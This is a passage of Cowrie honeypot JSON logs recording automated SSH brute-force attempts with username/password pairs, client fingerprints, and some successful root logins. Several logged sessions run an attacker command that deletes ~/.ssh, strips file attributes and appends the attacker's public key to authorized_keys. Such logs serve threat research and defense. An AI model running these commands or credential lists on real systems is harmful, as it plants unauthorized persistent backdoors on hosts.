AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:05:35.786442Z","src_ip":"212.227.235.229","session":"95426296eb1f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:05:35.966319Z","src_ip":"212.227.235.229","session":"95426296eb1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:05:35.967227Z","src_ip":"212.227.235.229","session":"95426296eb1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49438,"dst_ip":"1.2.3.4","dst_port":22,"session":"15c9dbee21a7","protocol":"ssh","message":"New connection: 212.227.235.229:49438 (1.2.3.4:22) [session: 15c9dbee21a7]","sensor":"my-vps","timestamp":"2025-08-28T15:05:36.154261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:05:36.154899Z","src_ip":"212.227.235.229","session":"15c9dbee21a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:05:36.341117Z","src_ip":"212.227.235.229","session":"15c9dbee21a7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:05:37.125526Z","src_ip":"212.227.235.229","session":"15c9dbee21a7"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:05:38.313564Z","src_ip":"212.227.235.229","session":"15c9dbee21a7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50490,"dst_ip":"1.2.3.4","dst_port":22,"session":"f88a106d4780","protocol":"ssh","message":"New connection: 212.227.235.229:50490 (1.2.3.4:22) [session: f88a106d4780]","sensor":"my-vps","timestamp":"2025-08-28T15:05:38.496110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:05:38.497149Z","src_ip":"212.227.235.229","session":"f88a106d4780"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:05:38.681196Z","src_ip":"212.227.235.229","session":"f88a106d4780"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:05:39.458724Z","src_ip":"212.227.235.229","session":"f88a106d4780"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:05:39.642963Z","src_ip":"212.227.235.229","session":"95426296eb1f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:05:39.645106Z","src_ip":"212.227.235.229","session":"f88a106d4780"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27118,"dst_ip":"1.2.3.4","dst_port":22,"session":"04a433cb587e","protocol":"ssh","message":"New connection: 212.227.235.229:27118 (1.2.3.4:22) [session: 04a433cb587e]","sensor":"my-vps","timestamp":"2025-08-28T15:06:11.579570Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:06:11.580469Z","src_ip":"212.227.235.229","session":"04a433cb587e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:06:11.708158Z","src_ip":"212.227.235.229","session":"04a433cb587e"}
{"eventid":"cowrie.login.failed","username":"yusuf","password":"yusuf","message":"login attempt [yusuf/yusuf] failed","sensor":"my-vps","timestamp":"2025-08-28T15:06:12.355609Z","src_ip":"212.227.235.229","session":"04a433cb587e"}
{"eventid":"cowrie.login.failed","username":"yusuf","password":"abc123","message":"login attempt [yusuf/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:06:13.491831Z","src_ip":"212.227.235.229","session":"04a433cb587e"}
{"eventid":"cowrie.login.failed","username":"yusuf","password":"abcd123","message":"login attempt [yusuf/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:06:14.623461Z","src_ip":"212.227.235.229","session":"04a433cb587e"}
{"eventid":"cowrie.login.failed","username":"yusuf","password":"abcd1234","message":"login attempt [yusuf/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:06:15.757266Z","src_ip":"212.227.235.229","session":"04a433cb587e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49298,"dst_ip":"1.2.3.4","dst_port":22,"session":"24ab2b6f789a","protocol":"ssh","message":"New connection: 212.227.125.160:49298 (1.2.3.4:22) [session: 24ab2b6f789a]","sensor":"my-vps","timestamp":"2025-08-28T15:06:15.868527Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:06:15.869556Z","src_ip":"212.227.125.160","session":"24ab2b6f789a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T15:06:15.918983Z","src_ip":"212.227.125.160","session":"24ab2b6f789a"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol","message":"login attempt [sol/sol] failed","sensor":"my-vps","timestamp":"2025-08-28T15:06:16.068484Z","src_ip":"212.227.125.160","session":"24ab2b6f789a"}
{"eventid":"cowrie.login.failed","username":"yusuf","password":"abc1234","message":"login attempt [yusuf/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:06:16.887040Z","src_ip":"212.227.235.229","session":"04a433cb587e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:06:17.118640Z","src_ip":"212.227.125.160","session":"24ab2b6f789a"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:06:18.017504Z","src_ip":"212.227.235.229","session":"04a433cb587e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62429,"dst_ip":"1.2.3.4","dst_port":22,"session":"90cad36fdc4d","protocol":"ssh","message":"New connection: 212.227.235.229:62429 (1.2.3.4:22) [session: 90cad36fdc4d]","sensor":"my-vps","timestamp":"2025-08-28T15:06:22.510685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:06:22.511431Z","src_ip":"212.227.235.229","session":"90cad36fdc4d"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:06:22.646768Z","src_ip":"212.227.235.229","session":"90cad36fdc4d"}
{"eventid":"cowrie.login.failed","username":"user","password":"fuckers","message":"login attempt [user/fuckers] failed","sensor":"my-vps","timestamp":"2025-08-28T15:06:23.267269Z","src_ip":"212.227.235.229","session":"90cad36fdc4d"}
{"eventid":"cowrie.login.failed","username":"user","password":"fletcher","message":"login attempt [user/fletcher] failed","sensor":"my-vps","timestamp":"2025-08-28T15:06:24.401197Z","src_ip":"212.227.235.229","session":"90cad36fdc4d"}
{"eventid":"cowrie.login.failed","username":"user","password":"content","message":"login attempt [user/content] failed","sensor":"my-vps","timestamp":"2025-08-28T15:06:25.536381Z","src_ip":"212.227.235.229","session":"90cad36fdc4d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59256,"dst_ip":"1.2.3.4","dst_port":22,"session":"05d4efa864ed","protocol":"ssh","message":"New connection: 217.72.205.35:59256 (1.2.3.4:22) [session: 05d4efa864ed]","sensor":"my-vps","timestamp":"2025-08-28T15:06:26.574296Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:06:26.575683Z","src_ip":"217.72.205.35","session":"05d4efa864ed"}
{"eventid":"cowrie.login.failed","username":"user","password":"account","message":"login attempt [user/account] failed","sensor":"my-vps","timestamp":"2025-08-28T15:06:26.670325Z","src_ip":"212.227.235.229","session":"90cad36fdc4d"}
{"eventid":"cowrie.login.failed","username":"user","password":"906090","message":"login attempt [user/906090] failed","sensor":"my-vps","timestamp":"2025-08-28T15:06:27.804854Z","src_ip":"212.227.235.229","session":"90cad36fdc4d"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:06:28.941696Z","src_ip":"212.227.235.229","session":"90cad36fdc4d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47074,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fdaeb26abb5","protocol":"ssh","message":"New connection: 212.227.235.229:47074 (1.2.3.4:22) [session: 8fdaeb26abb5]","sensor":"my-vps","timestamp":"2025-08-28T15:06:46.050149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:06:46.051243Z","src_ip":"212.227.235.229","session":"8fdaeb26abb5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:06:46.230573Z","src_ip":"212.227.235.229","session":"8fdaeb26abb5"}
{"eventid":"cowrie.login.failed","username":"jesus","password":"123","message":"login attempt [jesus/123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:06:46.989018Z","src_ip":"212.227.235.229","session":"8fdaeb26abb5"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:06:48.171606Z","src_ip":"212.227.235.229","session":"8fdaeb26abb5"}
{"eventid":"cowrie.session.connect","src_ip":"166.48.193.210","src_port":59104,"dst_ip":"1.2.3.4","dst_port":23,"session":"b2f0a71a6c78","protocol":"telnet","message":"New connection: 166.48.193.210:59104 (1.2.3.4:23) [session: b2f0a71a6c78]","sensor":"my-vps","timestamp":"2025-08-28T15:07:23.348831Z"}
{"eventid":"cowrie.session.closed","duration":30.960030794143677,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:07:54.308795Z","src_ip":"166.48.193.210","session":"b2f0a71a6c78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45552,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff9d808a982a","protocol":"ssh","message":"New connection: 212.227.235.229:45552 (1.2.3.4:22) [session: ff9d808a982a]","sensor":"my-vps","timestamp":"2025-08-28T15:07:59.952043Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:07:59.952930Z","src_ip":"212.227.235.229","session":"ff9d808a982a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:08:00.131802Z","src_ip":"212.227.235.229","session":"ff9d808a982a"}
{"eventid":"cowrie.login.success","username":"root","password":"Yz123456@","message":"login attempt [root/Yz123456@] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:08:00.890485Z","src_ip":"212.227.235.229","session":"ff9d808a982a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:08:01.268339Z","src_ip":"212.227.235.229","session":"ff9d808a982a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:08:01.269177Z","src_ip":"212.227.235.229","session":"ff9d808a982a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:08:01.269974Z","src_ip":"212.227.235.229","session":"ff9d808a982a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:01.450622Z","src_ip":"212.227.235.229","session":"ff9d808a982a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:08:01.869135Z","src_ip":"212.227.235.229","session":"ff9d808a982a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:08:01.869931Z","src_ip":"212.227.235.229","session":"ff9d808a982a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:08:02.051799Z","src_ip":"212.227.235.229","session":"ff9d808a982a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:02.052882Z","src_ip":"212.227.235.229","session":"ff9d808a982a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46134,"dst_ip":"1.2.3.4","dst_port":22,"session":"b211888e40dc","protocol":"ssh","message":"New connection: 212.227.235.229:46134 (1.2.3.4:22) [session: b211888e40dc]","sensor":"my-vps","timestamp":"2025-08-28T15:08:02.233969Z"}
